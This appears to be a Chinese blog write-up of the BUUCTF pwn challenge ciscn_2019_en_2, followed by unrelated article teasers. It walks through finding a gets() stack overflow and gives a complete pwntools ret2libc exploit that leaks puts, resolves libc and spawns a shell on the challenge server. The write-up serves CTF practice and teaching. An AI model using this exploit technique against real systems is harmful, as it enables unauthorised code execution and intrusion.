news 2026/5/30 4:34:32

buuctf中的ciscn_2019_en_2

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
buuctf中的ciscn_2019_en_2

首先checksec检查保护机制:

-64位程序

-开启了栈不可执行保护

接下来使用IDA反汇编工具进行分析:

发现begin函数,点进去

begin函数内部:

输入1可用进入encrypt函数,输入2可从主函数看到并没有什么用,3是退出程序

这是encrypt函数内部:

get函数可触发栈溢出漏洞,看到这一行代码就可用了,下面的加密过程对破解程序无任何帮助。顺便算出s到栈底的偏移:0x50+0x8 = 0x58

由于在IDA中没发现任何后门函数和system函数地址,所以这里考虑泄露libc后来得到system函数和/bin/sh,这里我们需要构造ROP链来调用函数,所以还需用到ret和rdi的地址,输入以下指令:

ROPgadget --binary pwn --only "pop|ret"

rdi地址:0x400c83,ret地址:0x4006b9,q其中rdi用于调用函数,ret用于栈对齐

再在IDA中拿到encrypt地址,用于第一次泄露libc后再次进入encrypt函数:0x4009A0

基本信息拿到,可用来写exp攻击脚本了:

from pwn import * from LibcSearcher import LibcSearcher context(arch='amd64', os='linux', log_level='debug') #io = process('./pwn') # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io = connect('node5.buuoj.cn',28902) # 与在线环境交互。 encrypt_addr = 0x4009A0 offset = 0x58 elf = ELF('./pwn') puts_got = elf.got['puts'] puts_plt = elf.plt['puts'] rdi_addr = 0x400c83 ret_addr = 0x4006b9 io.recvuntil(b'Input your choice!\n') io.sendline(b'1') io.recvuntil(b'Input your Plaintext to be encrypted\n') payload = b'a'*offset + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(encrypt_addr) io.sendline(payload) io.recvline() io.recvline() puts_addr = u64(io.recvline().strip().ljust(8,b'\x00')) print(hex(puts_addr)) libc = LibcSearcher('puts',puts_addr) libc_base = puts_addr - libc.dump('puts') system_addr = libc_base + libc.dump('system') bin_sh_addr = libc_base + libc.dump('str_bin_sh') io.recvuntil(b'Input your Plaintext to be encrypted\n') payload = b'a'*offset + p64(ret_addr) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr) io.sendline(payload) io.interactive()

这是运行结果:

这里需要手动选择libc,64位程序就选64位的libc,可能会选到不适配的libc库,多试几次就可用了,拿到shell后手动输入cat flag拿到flag

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/10 12:35:31

uni-app 的 iOS 打包与上架流程,多工具协作

在 uni-app 项目里,开发阶段往往推进得很快。页面、接口、业务逻辑一旦跑通,很容易产生一种错觉:打包和上架只是“工具帮忙完成的最后一步”。 但当你真正负责一次完整的 iOS 发布,就会发现问题并不集中在某个按钮或配置项&#x…

作者头像 李华
网站建设 2026/5/30 0:07:33

DeepSeek-V3.2技术深度解析:开源大模型如何媲美闭源巨头!

简介 DeepSeek-V3.2通过三大核心技术突破解决了开源模型长期面临的效率、性能和智能体能力短板。其创新的DeepSeek稀疏注意力机制显著提升长文本处理效率,可扩展强化学习框架释放了算力价值,大规模智能体任务合成增强了工具使用能力。该模型在多项权威基…

作者头像 李华
网站建设 2026/5/29 12:30:56

计算机毕业设计springboot基于java的动漫周边网店设计与实现 基于Spring Boot与Java的动漫周边电商平台开发与实践 Java技术驱动的Spring Boot动漫周边网络商店系统设

计算机毕业设计springboot基于java的动漫周边网店设计与实现c31vr9 (配套有源码 程序 mysql数据库 论文) 本套源码可以在文本联xi,先看具体系统功能演示视频领取,可分享源码参考。 随着互联网的飞速发展,动漫文化在全球范围内迅速…

作者头像 李华
网站建设 2026/5/10 18:19:28

怎么解析LLM 输出的JSON 字符串,保证不出错

怎么解析LLM 输出的JSON 字符串,保证不出错 json_repair 是什么 目录 怎么解析LLM 输出的JSON 字符串,保证不出错 json_repair 是什么 一、什么是 `json_repair` 二、使用示例(主流语言) 1. Python 版本(`json-repair` 库) 步骤1:安装 步骤2:核心示例 输出结果: 2. J…

作者头像 李华
网站建设 2026/5/23 21:21:34

数据湖赋能 SIEM:下一代安全运营的技术融合与实践

在数字化转型纵深推进的当下,企业 IT 架构日趋复杂,云计算、物联网、人工智能等技术的普及,使得网络攻击手段愈发隐蔽、攻击链条不断延长。传统安全信息与事件管理(SIEM)系统在面对海量、多源、异构的安全数据时&#…

作者头像 李华
网站建设 2026/5/27 20:40:17

AI元人文构想:从价值对齐到意义生成的哲学范式革命

AI元人文构想:从价值对齐到意义生成的哲学范式革命笔名:岐金兰作者说明:岐金兰公开分享的“AI元人文构想”系列手稿及本文的构思、核心论点与最终审定由作者完成,在文本的拓展、阐述与修改过程中,作者与大型语言模型&a…

作者头像 李华